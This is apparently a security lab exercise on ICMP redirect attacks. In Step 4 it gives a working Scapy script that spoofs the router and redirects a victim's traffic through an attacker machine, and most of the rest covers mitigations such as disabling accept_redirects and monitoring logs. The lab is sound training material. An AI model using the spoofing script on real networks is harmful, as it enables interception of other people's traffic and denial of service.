Logo Light

Network

Web Apps

System

Cloud

Cryptography

IoT

Exercise 25: Analyzing ICMP Redirects

by | Jan 25, 2025

Objective

Understand how ICMP Redirects affect network traffic by simulating and analyzing their impact. Learn mitigation techniques to secure devices against malicious routing manipulation.

Scenario

As a cybersecurity professional, you are tasked with understanding how ICMP Redirects can be used to manipulate network traffic and how to secure critical devices against this threat. In this exercise, you will simulate ICMP redirects using Scapy, analyze the changes in the routing table of a victim machine, and explore mitigation strategies.

⚠️ Important: This exercise should be performed in a legal and controlled lab environment. Unauthorized network manipulation is illegal and unethical.

Lab Instructions

Step 1: Set Up the Test Network

  • Router (R1): Acts as the default gateway.
  • Victim Machine (V1): The machine whose routing will be manipulated.
  • Attacker Machine (A1): Sends ICMP redirect packets to V1.

Network Setup Example:

  • Router (R1): 192.168.1.1
  • Victim (V1): 192.168.1.100
  • Attacker (A1): 192.168.1.200

Step 2: Install Required Tools

On the Attacker Machine (A1), install Scapy: 

sudo apt update 
sudo apt install python3-scapy -y

Step 3: Verify the Victim’s Routing Table

On Victim Machine (V1), check the routing table: 

ip route

The default gateway should be 192.168.1.1.

Step 4: Send ICMP Redirect Packet

On Attacker Machine (A1), create and send an ICMP redirect packet using Scapy: 

from scapy.all import *

victim_ip = "192.168.1.100"
router_ip = "192.168.1.1"
attacker_ip = "192.168.1.200"

# Craft ICMP Redirect Packet
pkt = IP(src=router_ip, dst=victim_ip) / ICMP(type=5, code=1, gw=attacker_ip) / IP(src=victim_ip, dst="8.8.8.8") / ICMP()

# Send Packet
send(pkt)

Explanation: This packet tells the victim to use the attacker’s IP (192.168.1.200) instead of the router (192.168.1.1).

Step 5: Analyze the Victim’s Routing Table

On Victim Machine (V1), check the updated routing table: 

ip route

Expected Result: A new route appears, redirecting traffic through the attacker’s IP (192.168.1.200).

Step 6: Test the Impact

On Victim Machine (V1), attempt to ping an external server: 

ping 8.8.8.8

The traffic may now be routed through the attacker’s machine.

Step 7: Mitigation – Disable ICMP Redirects

On Victim Machine (V1) and critical devices, disable ICMP redirects: 

sudo sysctl -w net.ipv4.conf.all.accept_redirects=0
sudo sysctl -w net.ipv4.conf.default.accept_redirects=0

Make it permanent: 

echo "net.ipv4.conf.all.accept_redirects = 0" | sudo tee -a /etc/sysctl.conf 
echo "net.ipv4.conf.default.accept_redirects = 0" | sudo tee -a /etc/sysctl.conf 
sudo sysctl -p

Step 8: Verify Mitigation

  • Attempt to send another ICMP redirect from the attacker machine.
  • Verify that the victim’s routing table remains unchanged.

Solution & Explanation

How ICMP Redirects Work

  • ICMP Redirects are used by routers to inform hosts of a more efficient route for a specific destination.
  • An attacker can forge these packets to reroute traffic through a malicious device, enabling Man-in-the-Middle (MitM) attacks.

Impact of ICMP Redirects

  • Traffic Interception: Allows attackers to monitor or alter traffic.
  • Denial of Service (DoS): Redirects traffic to a non-existent or malicious destination.

Mitigation Strategies

  1. Disable ICMP Redirects: Prevents devices from accepting route changes.
  2. Use Secure Routing Protocols: Implement protocols like OSPF with authentication.
  3. Network Segmentation: Isolate sensitive devices from public networks.
  4. Monitor for ICMP Anomalies: Use IDS/IPS to detect malicious ICMP traffic.

Testing & Verification

  • Confirm that the victim’s routing table was altered after the attack.
  • Verify that disabling ICMP redirects prevents further manipulation.
  • Monitor network traffic for unauthorized ICMP activity.

Check ICMP Settings:

sudo sysctl net.ipv4.conf.all.accept_redirects

Analyze Logs:

Review system logs for suspicious ICMP packets: 

sudo dmesg | grep ICMP 
sudo tail -f /var/log/syslog

Additional Script (Optional)

Automate the disabling of ICMP redirects:

#!/bin/bash
# Disable ICMP Redirects
sudo sysctl -w net.ipv4.conf.all.accept_redirects=0
sudo sysctl -w net.ipv4.conf.default.accept_redirects=0
sudo sysctl -p

echo "ICMP redirects have been disabled."

Run the script:

chmod +x disable_icmp_redirects.sh
sudo ./disable_icmp_redirects.sh

Conclusion

In this exercise, you simulated an ICMP Redirect Attack using Scapy to manipulate the victim’s routing table. You verified the attack’s impact and implemented mitigation strategies by disabling ICMP redirects. Understanding and securing routing protocols is critical to defending against such network manipulation attacks.

0 Comments